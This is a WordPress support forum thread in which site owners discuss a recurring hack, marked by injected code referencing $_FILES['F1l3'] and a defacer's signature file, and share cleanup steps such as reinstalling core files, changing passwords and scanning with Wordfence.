I see this right away
WordPress version outdated: Upgrade required.
Outdated WordPress Found: WordPress Under 4.0
Outdated Web Server Apache Found: Apache/2.2.24
No not that site. It doesn’t matter what site it is, as I’ve removed the offending code already.
Besides, an outdated version of wordpress should not cause the issue as stated above.
Besides, an outdated version of wordpress should not cause the issue as stated above.
Well, it certainly will make the site unsecured.
I’m only looking for solutions to my initial problem, please try and stay on topic.
Thanks Stephen. The website was hacked despite wordpress and plugins being up to date, so I replaced all wordpress install files/folders, upgraded the theme and changed both FTP and wordpress passwords.
It seems to be just this $_FILES['F1l3'] thing that has come back twice now after deletion.
Hello ‘goldenagemedia’,
My site was hacked yesterday night. Even I see similar content ($_FILES[‘F1l3’]) in some of wordpress files.
After upgrading wordpress and theme is your site back? Did you do anything else to fix the issue?
Thanks,
@raghavendra89,
Yes I managed to get it up and running again after reinstalling everything, although overnight it seems to have happened again.
I have replaced the index.php and wp-blog-header.php files again to fix it, but here is a screengrab of the problem when it happens:
https://drive.google.com/file/d/0B_DiQO5cOpWkczA0em9hSGVLcDg/view
I think this site might just be being targeted, not sure.
it seems to have happened again.
That’s generally what happens with hacked sites unless you’ve fully cleaned up the hack and secured the site. Did you go through all of the resources listed above?
Yes I’ve dealt with many hacked sites over the years, and the methods such as the ones listed above have usually fixed them, with no recurring issues.
This one is different to what I’ve dealt with before (I’ve never seen this code also). No matter how many times I remove the malicious code, it keeps coming back a few days later.
Hello everyone, im new here.
Sorry I know this topic is old but I just found out that one of my websites are having the same problem as described above.
I cleaned all files where I found that pice of code, and I removed one file called zxcvbnm.php where was this piece of code:
<!--------------------------------------------
Sat Apr 4 18:05:04 EST 2015
owned by NG689Skw (Index Php)
[email protected], Indonesia
twitter.com/_IndexPhp_
--------------------------------------------->
Malware code deleted
Also i updated wordpress and all plugins, but I am curious how this Indonesians get into this website. What should I do to prevent to happen again?
Did anyone found out how to get rid of this for good?
Moderator
Jan Dembowski
(@jdembowski)
Forum Moderator and Brute Squad
AnnaBell,
I fixed my hacked website by performing the following steps:
1. Changed passwords for both WordPress backend and FTP hosting account.
2. Deleted wp-includes, wp-admin and root files (except the wp-config.php)
4. Opened my wp-config.php file to make sure there was no malware code in it
3. Re-installed WordPress files/folders manually
4. Updated all plugins
5. Installed Wordfence plugin and ran a scan
6. Found files that were infected or shouldn’t be there and either had them removed by Wordfence or found the file via FTP and removed the malware from the file
FYI: I found alot of new files were strewn throughout the Uploads folder. Wordfence was great as it picked up on all these and I just deleted them via Wordfence.
The unfortunate reality is hacking is just a part of web life now. I have had a fair few websites hacked lately by the Gantengers Crew from Indonesia, who openly gloat about their hacking accomplishments.
Hope this helps you.
Thanx guys for all advices,
I did most of those things you mentioned, so far everything looks good.
Hopefully it will not come back.
Thnx once again
